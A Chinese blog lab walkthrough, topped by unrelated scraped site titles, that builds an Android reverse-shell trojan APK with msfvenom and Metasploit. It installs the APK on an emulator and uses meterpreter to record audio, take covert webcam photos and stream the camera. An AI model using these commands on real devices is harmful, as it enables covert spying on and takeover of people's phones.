华容网站,如何做简易个人网站,苏州市建设交易中心网站首页,安卓软件开发环境目录
目录
前言
系列文章列表
渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2
思维导图
1#xff0c;实验涉及复现环境
2,Android模拟器环境配置
2.1,首先从官网上下载雷电模拟器
2.2,安装雷电模拟器
2.3, 对模拟器网络进行配置
2.3.1,为什么要进行配置…目录
目录
前言
系列文章列表
渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2
思维导图
1实验涉及复现环境
2,Android模拟器环境配置
2.1,首先从官网上下载雷电模拟器
2.2,安装雷电模拟器
2.3, 对模拟器网络进行配置
2.3.1,为什么要进行配置
2.3.2,进行配置
2.3.3,安装成功后显示安装成功
3生成后门
3.1,生成木马apk文件
3.2,将文件复制到windows系统上
3.3,将apk文件安装到模拟器中
3.4,木马文件安装成功
4,使用metasploit控制台对模拟器进行攻击
4.1 启动metasploit
4.2,使用攻击模块
4.3,设置攻击载荷
4.4,设置攻击机和端口号和攻击
4.5,回到我们的模拟器靶机我们点击运行我们安装的文件 4.6 看到成功返回shell
5, 成功后我们能做什么?
5.1,查看模拟手机的版本信息
5.2,查看手机的网络信息
5.3,查看root状态
5.4,启用网页视屏聊天
5.5,查看手机有几个摄像头
5.6,进行录音操作
5.7,一些其他操作
5.7.1.网络和系统信息获取
5.7.2,系统命令执行和摄像头操作
6总结 前言 本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试. 系列文章列表
渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2
思维导图 1实验涉及复现环境 Kali平台Hack192.168.10.xxxAndroid模拟器靶机1kali需要使用桥接模式,不然无法使用 如果出现桥接无法使用可以看这位大佬的配置教程 kali无法连接网络桥接、NAT无效http://t.csdn.cn/r9cug 2,Android模拟器环境配置
2.1,首先从官网上下载雷电模拟器 打开官网进行下载 雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)https://www.ldmnq.com/ 2.2,安装雷电模拟器 下载完后。点击.exe文件直接运行安装运行下一步直接完成安装。 安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器 2.3, 对模拟器网络进行配置
2.3.1,为什么要进行配置 安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制. 2.3.2,进行配置 对模拟器网络进行配置在右边的设置里面选择设置网络设置网络桥接模式开启ip设置dhcp最下面点击安装 2.3.3,安装成功后显示安装成功 3生成后门
3.1,生成木马apk文件 打开虚拟机启动kali,打开终端生成apk后门。lhost为kali的ip可以根据自己的IP设定lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令 msfvenom -p android/meterpreter/reverse_tcp lhost192.168.223.138 lport5001 内心如初.apk 3.2,将文件复制到windows系统上 生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器点击启动 3.3,将apk文件安装到模拟器中 这里我们可以将文件拖入或是选择文件放入也行 在右下角有个apk,点击选择文件安装。 3.4,木马文件安装成功 出现下面的图标代表安装木马文件成功 4,使用metasploit控制台对模拟器进行攻击 这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍 4.1 启动metasploit
msfconsole 4.2,使用攻击模块
use exploit/multi/handler 4.3,设置攻击载荷 攻击载荷也就是攻击的脚本 set payload android/meterpreter/reverse_tcp 4.4,设置攻击机和端口号和攻击 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致 set lhost 192.168.xxx.xxx
set lport 5001
run4.5,回到我们的模拟器靶机我们点击运行我们安装的文件 4.6 看到成功返回shell 只要双击一次即可,这里是我多点了 5, 攻击成功后我们能做什么? 这里在进行其他操作前需要先加载stdapi扩展
load stdapi 5.1,查看模拟手机的版本信息
sysinfo 5.2,查看手机的网络信息
ifconfig 5.3,查看root状态
check_root 手机无root权限 5.4,启用网页视屏聊天
webcam_chat 5.5,查看手机有几个摄像头
webcam_list 显示有两个摄像头 5.6,进行录音操作
record_mic 5.7,一些其他操作 进行调用摄像头偷拍,默认为前置摄像头 webcam_snap网页摄像机视屏流显示实时画面能够调用摄像头实时观看被攻击者的像机对着的物体以下为通过此办法可以获取到一段图片资料 webcam_stream 获得shell后有很多的攻击方法,将其汇总如下 5.7.1.网络和系统信息获取 5.7.2,系统命令执行和摄像头操作 6总结 本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力. 每日一言 如果可以的话我也想成为这个世界中特殊的存在。 如果我的学习笔记对你有用不妨点赞收藏一下感谢你的支持当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充对我学习大有帮助谢谢。